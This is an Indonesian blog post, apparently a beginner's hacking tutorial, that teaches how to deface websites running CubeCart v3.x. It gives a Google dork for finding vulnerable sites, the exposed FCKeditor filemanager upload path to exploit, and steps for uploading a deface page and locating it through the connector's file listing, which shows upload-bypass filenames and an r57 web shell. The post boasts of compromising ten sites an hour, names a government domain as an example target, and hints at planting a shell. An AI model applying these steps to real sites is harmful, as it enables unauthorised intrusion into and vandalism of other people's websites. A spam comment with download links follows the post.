Translate

Tutor Dasar Deface

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site :D

[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

Ok langsung aja yah..
sesuai judul CubeCart Upload file

buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'

cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya
siph deh bisa :P

1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload


Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errors”

OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files

Kurang lebih seperti ini

Code:
<Connector command="GetFoldersAndFiles" resourceType="File">
<CurrentFolder path="/" url="/[pacth]/file/"/>
�
<Folders>
<Folder name="test"/>
</Folders>
�
<Files>
<File name="a_asp;_jpg(1).gif" size="53"/>
<File name="a_asp;_jpg.gif" size="53"/>
<File name="fe.php6" size="188"/>
<File name="robtz.html" size="18"/>
<File name="fe.php?" size="188"/>
<File name="fe_php." size="188"/>
<File name="hn(1).txt" size="1"/>
<File name="hn.txt" size="1"/>
<File name="r57.php~" size="108"/>
</Files>
</Connector>

Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.html”
Example : http://site.gov.my/fileupload/file/robtz.html

bakal keliatan seperti SS berikut..
Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi
seep..
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..

gimana? gampang bukan?
heheheh

====================================================================================
================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================ 

AldyFrz

1 comment:

  1. AnonymousApril 19, 2022 at 11:52 PM

    Tutorial Networking: Tutor Dasar Deface >>>>> Download Now

    >>>>> Download Full

    Tutorial Networking: Tutor Dasar Deface >>>>> Download LINK

    >>>>> Download Now

    Tutorial Networking: Tutor Dasar Deface >>>>> Download Full

    >>>>> Download LINK k0

    ReplyDelete

Subscribe to: Post Comments (Atom)